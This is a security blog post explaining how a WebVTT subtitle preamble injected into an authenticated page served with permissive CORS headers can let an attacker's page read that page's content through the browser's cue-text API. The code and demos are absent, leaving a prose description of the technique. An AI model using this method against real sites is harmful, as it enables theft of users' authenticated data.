Abusing WebVTT and CORS for fun and profit

WebVTT is a way html5 developers can display and cue text as subtitles for video formats. The grammar for WebVTT is pretty simple and as we know browsers are always willing to forgive any "weird" looking grammar in an effort to provide best effort experience for users. This post looks at ways to take advantage of WebVTT in some attack contexts in order to extract information or perform general DOM abuse.


Video tags can make use of subtitle files, as follows:

WebVTT (subtitle) files need to follow this format:

The file merely describes cues, allows you to number them and associate a duration and display time for them. Display timestamps specify hours (hh), minutes (mm) , seconds (s) and milliseconds (ttt). According to my basically inspection of the grammar, most browser require you to respect the placeholders (significant figures) if you specify the magnitude. For instance, if you want to indicate hours you need to use both place holders, same goes for others. You must specify the "-->" to indicate the end timestamp.

Grammar Quirks

The grammar is not extremely strict, you can get away with alot. Here's a quick summary of some of the things I've noticed for Safari, Chrome and Firefox:

  • The file must start with "WEBVTT"
  • It doesn't matter what comes after the first few bytes (described above)
  • Numbering cues is optional, the browser usually just fills an array with these the cues.
  • Just about anything after the timestamp is considered part of the cue until another one is specified.
  • It doesn't matter what the content type of the subtitle file is 

Extraction Attacks

So now that we know what we can and can't do with the grammar lets see how we can abuse this. Here's the attack contet:

  1. A server hosts some authenticated content only a logged in user can access, with the metioned users access rights. 
  2. An attacker wants to extract this, but needs to do this under the mentioned user's access rights.
  3. The user is free to visit any arbitrary page and the attacker is on a remote network.
  4. The host web server has a cross origin headers like this: "Access-Control-Allow-Origin: *"
  5. The web server hosts a page that suffers from an injection vulnerability allowing the attacker to specify the first few bytes of the page

This is for all intents and purposes the same attack context as a CSRF vulenrability, and abuses the same mechanism in the browser that a CSRF attack does. Point number 4 is the kicker, should any JavaScript, JSON, or any arbitrary content harbor secrets in such a away that the attacker can inject into the first few bytes, there is a way to extract these secrets using WebVTT.

Straight Extraction Attack

Here's the basic attack idea, the attacker hosts the injectable page in such a way that it is interpreted as a WebVTT page, here's a demo
The trigger (as seen above) looks like this:


If this is inserted into the first few bytes of the page it will force it to be rendered as follows:

Which then forces the browser to interpret it as a valid WebVTT file, and the HTML content would be the subtitle text. Here's where the magic comes in; most browser have a javascript API for accessing the actual text in the cues, here's a quick demo of extracting the first cue's text:

And here's a screen shot of me using this trick to demonstrate that it could work against HTTP headers (random arbitrary content) should I be able to inject the WEBVTT preamble as discussed above (the screenshot shows Safari and Firefox):

Further Reading and References